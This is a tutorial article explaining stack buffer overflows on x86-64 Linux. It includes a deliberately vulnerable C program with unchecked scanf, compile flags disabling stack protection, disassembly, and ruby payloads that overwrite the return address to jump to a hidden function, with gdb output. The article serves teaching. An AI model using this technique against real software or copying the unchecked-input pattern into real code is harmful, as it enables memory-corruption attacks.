Introduction
This article provides a hands-on guide to exploiting a buffer overflow, one of the most well-known and impactful software vulnerabilities. You'll learn how an attacker can manipulate a program's memory to execute arbitrary code, bypassing its intended behavior. By the end, you'll understand the mechanics behind buffer overflows and how they can lead to serious security risks.
Prerequisites
To follow along, you should have:
- A basic understanding of C programming, including pointers and memory management.
- Familiarity with the Linux command line and tools such as gcc and gdb.
- A general understanding of computer architecture, specifically the stack and how functions are called.
Although the code used for this demonstration is not inherently dangerous, it is best to perform the exploitation in a controlled environment. That way, we’ll be ready when things get more interesting.
What is a Buffer Overflow?
A buffer overflow is a vulnerability in software that occurs when a program writes more data to a fixed-length block of memory (a buffer) than it is designed to hold. This can cause unintended behavior, including crashes, data corruption, or even exploitation by attackers to gain control of the system.
The bytes that do not fit spill into adjacent memory. On the stack, that adjacent memory includes the saved return address of the current function, so an attacker who controls the input can redirect program control to an arbitrary location, such as malicious code or a 'secret' function.
Stack Memory Layout and Function Calls
To understand how a buffer overflow can be exploited, we need to examine how the stack changes when a function is called.
Function Prologue
When a function is called, the following steps occur:
- The return address (where execution should continue after the function ends) is pushed onto the stack.
- The base pointer (rbp) of the previous function is saved to keep track of the caller's stack frame.
- The stack pointer (rsp) is adjusted to allocate space for local variables.
For example, when calling the echo() function in our vulnerable program, the stack initially looks like this (lowest address at the top):
| Local Buffer (32 bytes) |
| Saved %rbp (from main) |
| Return Address (to main) | <- loaded into %rip on ret
Note that the buffer is declared as 20 bytes, but the compiler reserves 32 bytes on the stack (sub $0x20,%rsp).
Understanding Key Registers
To fully grasp how buffer overflows work, let's review the key registers involved:
- rbp (Base Pointer): Holds the base address of the current function's stack frame. Used to access function parameters and local variables.
- rsp (Stack Pointer): Points to the top of the stack, which grows downwards (towards lower addresses) as new data is pushed.
- rip (Instruction Pointer): Holds the address of the next instruction to be executed. It cannot be written directly, but ret loads it from the return address saved on the stack, so overwriting that saved value lets an attacker redirect execution.
Function Epilogue
When the function ends:
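- The stack pointer (rsp) is moved back to the base of the frame, discarding the local variables.
- The caller's base pointer (rbp) is restored from the stack (the leave instruction performs both of these steps).
- The function returns to the stored return address (ret instruction), resuming execution.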
If an attacker overwrites the return address, they can control where execution continues.
Exploitation
Vulnerable code
#include <stdio.h>

void secret() {
    printf("Oops, you weren't supposed to see this 0_0!\n");
}

void echo() {
    char buffer[20];
    printf("What's your name?\n");
    scanf("%s", buffer);
    printf("Hello, %s!\n", buffer);
}

int main(int argc, char* argv[]) {
    echo();
    return 0;
}
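Compile the code with the following flags so that addresses are fixed and the stack is not protected:
- -static: links the binary statically. In this build the result is loaded at a fixed address, so secret is at the same location on every run.
- -fno-stack-protector: disables the stack canary that would otherwise detect an overwritten return address.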
all:
	gcc -static vuln.c -o vuln -fno-stack-protector
clean:
	rm vuln
To identify the address of the secret function, disassemble the binary using objdump:
objdump -d vuln
This prints a large amount of assembly, but we will focus on the following section.
0000000000401905 <secret>:
401905: f3 0f 1e fa endbr64
401909: 55 push %rbp
40190a: 48 89 e5 mov %rsp,%rbp
40190d: 48 8d 05 1c b7 09 00 lea 0x9b71c(%rip),%rax # 49d030 <__rseq_flags+0x2c>
401914: 48 89 c7 mov %rax,%rdi
401917: e8 34 1a 01 00 call 413350 <_IO_puts>
40191c: 90 nop
40191d: 5d pop %rbp
40191e: c3 ret
000000000040191f <echo>:
40191f: f3 0f 1e fa endbr64
401923: 55 push %rbp
401924: 48 89 e5 mov %rsp,%rbp
401927: 48 83 ec 20 sub $0x20,%rsp
40192b: 48 8d 05 2a b7 09 00 lea 0x9b72a(%rip),%rax # 49d05c <__rseq_flags+0x58>
401932: 48 89 c7 mov %rax,%rdi
401935: e8 16 1a 01 00 call 413350 <_IO_puts>
40193a: 48 8d 45 e0 lea -0x20(%rbp),%rax
40193e: 48 89 c6 mov %rax,%rsi
401941: 48 8d 05 26 b7 09 00 lea 0x9b726(%rip),%rax # 49d06e <__rseq_flags+0x6a>
401948: 48 89 c7 mov %rax,%rdi
40194b: b8 00 00 00 00 mov $0x0,%eax
401950: e8 9b 34 00 00 call 404df0 <__isoc99_scanf>
401955: 48 8d 45 e0 lea -0x20(%rbp),%rax
401959: 48 89 c6 mov %rax,%rsi
40195c: 48 8d 05 0e b7 09 00 lea 0x9b70e(%rip),%rax # 49d071 <__rseq_flags+0x6d>
401963: 48 89 c7 mov %rax,%rdi
401966: b8 00 00 00 00 mov $0x0,%eax
40196b: e8 50 35 00 00 call 404ec0 <_IO_printf>
401970: 90 nop
401971: c9 leave
401972: c3 ret
At the beginning of the echo function, we can see that the compiler reserves 32 bytes on the stack (sub $0x20,%rsp), and that buffer starts at -0x20(%rbp), the lowest address of that area. The stack therefore looks like this:
| Local Buffer (32 bytes) |
| Saved %rbp (from main) |
| Return Address (to main) | <- loaded into %rip on ret
Our C code performs no bounds checking, so what happens if we enter a string longer than the buffer?
If we enter 20 to 31 characters, nothing visible happens: the write runs past the 20-byte buffer but stays inside the 32 bytes reserved for locals. Longer input overwrites the 8 bytes of the saved rbp and then the 8 bytes of the return address, and the program typically crashes with a segmentation fault. Let's inspect it using gdb to find out what is going on. The payload needs 40 filler bytes (32 + 8) followed by the 8 bytes that will replace the return address. We can create it using, for example, ruby.
ruby -e 'print "a"*40 + "\xFE\xCA\x00\x00\x00\x00\x00\x00"' > input_data
Now we start a gdb session on our executable and pass the payload as input:
(gdb) run < input_data
Starting program: /home/user/Desktop/c/buffer_overflow/vuln < input_data
What's your name?
Hello, aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa�
Program received signal SIGSEGV, Segmentation fault.
0x000000000000cafe in ?? ()
(gdb) x $rip
0xcafe: Cannot access memory at address 0xcafe
We can see that the overwritten return address ended up in $rip: the bytes FE CA are read as the little-endian address 0xcafe. That address is not mapped, so we get a SIGSEGV and nothing interesting happens. But what if we set $rip to a valid address?
From the disassembly of our binary, we know that the address of secret is 0x401905:
0000000000401905 <secret>
...
We update the payload so that its last 8 bytes hold that address in little-endian order (least significant byte first):
ruby -e 'print "a"*40 + "\x05\x19\x40\x00\x00\x00\x00\x00"' > input_data
As before, we execute the binary and pass the payload as input:
(gdb) run < input_data
Starting program: /home/user/Desktop/c/buffer_overflow/vuln < input_data
Downloading separate debug info for system-supplied DSO at 0x7ffff7ffd000
What's your name?
Hello, aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa@!
Oops, you weren't supposed to see this 0_0!
Program received signal SIGSEGV, Segmentation fault.
0x00007fffffffe000 in ?? ()
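We still get a SIGSEGV, but this time only after the secret function has run. The crash most likely happens because secret itself returns to whatever value follows our payload on the stack, which is not a valid code address.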